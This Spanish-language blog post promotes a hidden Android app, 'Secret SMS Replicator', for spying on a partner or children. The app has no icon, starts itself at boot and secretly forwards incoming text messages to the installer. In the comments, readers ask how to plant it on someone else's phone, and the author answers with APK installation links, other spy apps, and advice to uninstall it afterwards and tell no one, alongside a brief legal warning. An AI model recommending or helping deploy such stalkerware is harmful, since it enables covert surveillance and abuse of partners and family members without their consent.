Secret SMS Replicator

¿Crees que te ponen los cuernos? ¿Quieres espiar a tu novia/novio o hijos? Simplemente descarga e instala “Scret SMS Replicator” para Android y rras configurar tu número, la aplicación se ejecutará en secreto (segundo plano ) y reenviará los mensajes entrantes que reciba el terminal al número de teléfono que hayas puesto.
 
Esta aplicación no tiene ningún icono y una vez que se instala es imposible de encontrar en el teléfono. Por supuesto se autoinicia después de cada encendido. La única manera de acceder a la aplicación es mediante una contraseña secreta. Lógicamente no sugerimos instalar “Secret Replicator SMS” en el teléfono de cualquier persona. Evidentemente el uso de este tipo de aplicación vulnera el derecho a la intimidad y puede derivar esto en problemas legales para usted yo nos hacemos responsables de cualquier daño en su vida personal.

De hecho este programa fue retirado del Market de Android por infringir la intimidad de otros usuarios.

37 comments

  1. al instalarlo me pone el “abrir” apagado y me deja presionar el boton “Hecho” y no pasa nada para poder configurar. mi equipo tiene android 2.3

  2. Hola chamo esta cool la apli a lo mejor puedes ayudarme no sabes como puedo saber el nombre del dueño de un # de telefono,
    me estan llamando de un # raro quisiera saber de quien es el #..

    1. Hola,

      Te dejo a continuación el link que te explicará como instalar archivos APK para que puedas instalar esta aplicación o cualquier otra con el mismo sistema:

      http://androidbasico.blogspot.com.es/2011/10/manual-de-como-instalar-aplicaciones.html

      Otra cosa: como verás por la fecha este artículo es un poco antiguo, además algunos usuarios han reportado que con algunos celulares no funciona correctamente. Te aconsejo que uses otras aplicaciones como Android LOST:

      http://bit.ly/QJHO5k

      O Spy Mobile.

      https://play.google.com/store/apps/details?id=com.retina.mobileSpyInfo

      Y por último déjame que te diga una cosa. Te lo comento por lo que has dicho arriba de que “necesitas pruebas”. Comprendo cuan angustiosa debe de ser tu situación actual y comprendo que en este momento de tu vida estás atravesando un problema, pero cuidado el uso de este tipo de aplicaciones en teléfonos celulares que no son tuyos en la gran mayoría de países constituye un delito tipificado por la Ley, cuidado no vayas a tener dos problemas en lugar de uno. Si lo vas a usar, racionaliza tus sentimientos, luego desinstálalo y no le cuentes a nadie lo que has hecho.

      Un saludo y suerte!

  3. chiko podrias decirme como hago instalo la app en el cel q quiero espiar y luego? gracias va a ser de mucha ayuda en este momento de mi vida quiero tomar una decicion pero no tengo una prueba concreta…. 🙁

  4. Buenisimo muchas graxx… el tema es despues de instalar… como hago para configurarlo… en donde o que botones toco para activar al configuracion del APK.. grax

  5. Lo he intentado instalar en mi propio telefono para probar que tal funciona, pero al instalarlo dice aplicacion instalada y solo me salen dos pestañas, abrir pero esa pestaña esta opaca y no hace nada al presionar en ella, la otra pestaña dice listo, al presionar se cierra..pero no sale nada para configurar..alguien ha podido instalarlo en un htc desire?

Leave a Reply

Tu dirección de correo electrónico no será publicada. Los campos obligatorios están marcados con *